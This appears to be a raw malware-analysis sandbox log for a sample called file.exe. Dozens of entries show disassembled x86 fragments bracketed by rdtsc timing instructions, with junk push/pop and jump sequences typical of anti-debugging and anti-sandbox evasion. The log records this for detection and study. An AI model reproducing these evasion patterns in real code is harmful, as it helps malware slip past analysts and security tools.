Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60CB3F second address: 60CB5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D495h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60CB5F second address: 60CB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60CB67 second address: 60CB6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60CB6C second address: 60CB98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F275F2h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F02B8F275F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60CB98 second address: 60CB9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60CB9C second address: 60CBA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60D106 second address: 60D10A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60D10A second address: 60D110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60D110 second address: 60D12F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D499h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60D12F second address: 60D133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60D133 second address: 60D142 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60D142 second address: 60D147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61110C second address: 611112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 611112 second address: 611118 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 613D57 second address: 613D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02B8F2D492h 0x00000009 popad 0x0000000a jne 00007F02B8F2D48Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 613D7A second address: 613D85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F02B8F275E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59B481 second address: 59B49F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F02B8F2D486h 0x00000009 jmp 00007F02B8F2D493h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6196A8 second address: 6196BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F02B8F275E6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F02B8F275E6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6196BB second address: 6196C1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 592C15 second address: 592C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F02B8F275E6h 0x0000000a jmp 00007F02B8F275F3h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 592C32 second address: 592C36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6182D1 second address: 6182D9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 618413 second address: 61841D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F02B8F2D486h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61841D second address: 61843A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F02B8F275F4h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61843A second address: 61843E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 618709 second address: 618723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F02B8F275F1h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 618723 second address: 618727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 618727 second address: 618757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F02B8F275F3h 0x00000011 jp 00007F02B8F275E6h 0x00000017 popad 0x00000018 jmp 00007F02B8F275EAh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61889F second address: 6188DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02B8F2D491h 0x00000009 pop esi 0x0000000a jne 00007F02B8F2D4A2h 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F02B8F2D486h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 618A0C second address: 618A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F02B8F275F2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 618A2B second address: 618A2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 618E01 second address: 618E05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 618E05 second address: 618E30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F02B8F2D486h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F02B8F2D48Eh 0x00000012 pushad 0x00000013 popad 0x00000014 jc 00007F02B8F2D486h 0x0000001a pop esi 0x0000001b js 00007F02B8F2D4B9h 0x00000021 push eax 0x00000022 push edx 0x00000023 jnp 00007F02B8F2D486h 0x00000029 push eax 0x0000002a pop eax 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 618E30 second address: 618E49 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F02B8F275E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F02B8F275EDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 618E49 second address: 618E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61ECE4 second address: 61ECEE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F02B8F275E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61ECEE second address: 61ECFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 ja 00007F02B8F2D496h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61F3EF second address: 61F3F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61F3F3 second address: 61F3FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61F709 second address: 61F72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02B8F275EAh 0x00000009 jmp 00007F02B8F275F7h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E5411 second address: 42EBEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jnp 00007F02B8F2D492h 0x0000000c nop 0x0000000d mov cx, 6017h 0x00000011 push dword ptr [ebp+122D0C69h] 0x00000017 or dword ptr [ebp+122D1CEDh], edx 0x0000001d call dword ptr [ebp+122D2ABDh] 0x00000023 pushad 0x00000024 mov dword ptr [ebp+122D2C9Bh], ecx 0x0000002a xor eax, eax 0x0000002c mov dword ptr [ebp+122D2C9Bh], edx 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 sub dword ptr [ebp+122D2C9Bh], ecx 0x0000003c mov dword ptr [ebp+122D3AC3h], eax 0x00000042 mov dword ptr [ebp+122D2C9Bh], eax 0x00000048 mov esi, 0000003Ch 0x0000004d xor dword ptr [ebp+122D2C9Bh], ecx 0x00000053 add esi, dword ptr [esp+24h] 0x00000057 pushad 0x00000058 mov edx, dword ptr [ebp+122D3967h] 0x0000005e jmp 00007F02B8F2D490h 0x00000063 popad 0x00000064 lodsw 0x00000066 sub dword ptr [ebp+122D2C9Bh], esi 0x0000006c stc 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 pushad 0x00000072 pushad 0x00000073 mov edi, edx 0x00000075 sub dword ptr [ebp+122D2C9Bh], eax 0x0000007b popad 0x0000007c mov di, bx 0x0000007f popad 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 jc 00007F02B8F2D487h 0x0000008a mov dword ptr [ebp+122D2C9Bh], ebx 0x00000090 push eax 0x00000091 pushad 0x00000092 push esi 0x00000093 push eax 0x00000094 push edx 0x00000095 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E549D second address: 5E54DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 xor dword ptr [esp], 3AA37739h 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F02B8F275E8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 and ch, FFFFFFB1h 0x00000028 push 5F7C7A86h 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 pushad 0x00000033 popad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E54DD second address: 5E54ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F2D48Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E58EC second address: 5E58F6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F02B8F275E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E60D3 second address: 5E60E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E60E3 second address: 5E612F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F02B8F275EFh 0x00000008 jmp 00007F02B8F275F6h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 push ebx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pop ebx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F02B8F275EDh 0x0000001f popad 0x00000020 popad 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push edx 0x00000026 push ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E6235 second address: 5E623B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E623B second address: 5E623F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E623F second address: 5E6243 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E6243 second address: 5E6275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub cl, FFFFFF87h 0x0000000e lea eax, dword ptr [ebp+12489B9Eh] 0x00000014 mov ecx, eax 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a jmp 00007F02B8F275F7h 0x0000001f pop esi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E6275 second address: 5E627F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F02B8F2D48Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E627F second address: 5E628C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E628C second address: 5E6292 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6236BD second address: 6236CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F02B8F275E6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 623822 second address: 623840 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F02B8F2D490h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F02B8F2D48Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 623936 second address: 62393C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 626103 second address: 62610A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62610A second address: 62611A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F02B8F275E6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 626272 second address: 626278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 626278 second address: 62627C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62627C second address: 626294 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 ja 00007F02B8F2D48Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 626294 second address: 626298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 626298 second address: 62629C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 628DFF second address: 628E05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 629092 second address: 6290A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007F02B8F2D486h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62E418 second address: 62E427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02B8F275EBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62E427 second address: 62E452 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F02B8F2D499h 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jo 00007F02B8F2D48Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62E5C6 second address: 62E5CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62E9BF second address: 62E9D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F02B8F2D48Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E5B93 second address: 5E5C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push ebx 0x00000006 pushad 0x00000007 jno 00007F02B8F275E6h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop ebx 0x00000011 nop 0x00000012 call 00007F02B8F275EEh 0x00000017 call 00007F02B8F275F9h 0x0000001c push eax 0x0000001d pop edi 0x0000001e pop edx 0x0000001f pop ecx 0x00000020 mov ebx, dword ptr [ebp+12489BDDh] 0x00000026 or dword ptr [ebp+12451198h], edx 0x0000002c jng 00007F02B8F275ECh 0x00000032 mov ecx, dword ptr [ebp+1247AE5Eh] 0x00000038 add eax, ebx 0x0000003a je 00007F02B8F275ECh 0x00000040 mov edi, dword ptr [ebp+122D389Fh] 0x00000046 mov di, si 0x00000049 nop 0x0000004a jl 00007F02B8F275F2h 0x00000050 jnp 00007F02B8F275ECh 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5E5C08 second address: 5E5C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007F02B8F2D490h 0x0000000a nop 0x0000000b jnl 00007F02B8F2D48Eh 0x00000011 push 00000004h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F02B8F2D488h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d jmp 00007F02B8F2D48Bh 0x00000032 xor dword ptr [ebp+122D26B7h], ebx 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jnc 00007F02B8F2D48Ch 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 632C78 second address: 632C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6365D1 second address: 6365DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F02B8F2D486h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6365DC second address: 6365E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6365E2 second address: 6365E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63E6BE second address: 63E6C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F02B8F275E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63C6BC second address: 63C6C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F02B8F2D486h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63CB26 second address: 63CB2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63CB2A second address: 63CB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02B8F2D490h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d push ebx 0x0000000e jnc 00007F02B8F2D486h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pop ebx 0x00000017 je 00007F02B8F2D48Ah 0x0000001d jmp 00007F02B8F2D48Bh 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63CB64 second address: 63CB6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63CE50 second address: 63CE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02B8F2D494h 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63D174 second address: 63D179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63D179 second address: 63D195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F2D492h 0x00000009 je 00007F02B8F2D486h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63DA33 second address: 63DA3F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F02B8F275E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63DA3F second address: 63DA5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F02B8F2D490h 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63E075 second address: 63E0A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F275F9h 0x00000007 jmp 00007F02B8F275EAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 63E0A2 second address: 63E0AC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F02B8F2D486h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 643B47 second address: 643B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6478CC second address: 6478D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 59CE29 second address: 59CE3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 pop eax 0x0000000a je 00007F02B8F275E6h 0x00000010 popad 0x00000011 rdtsc
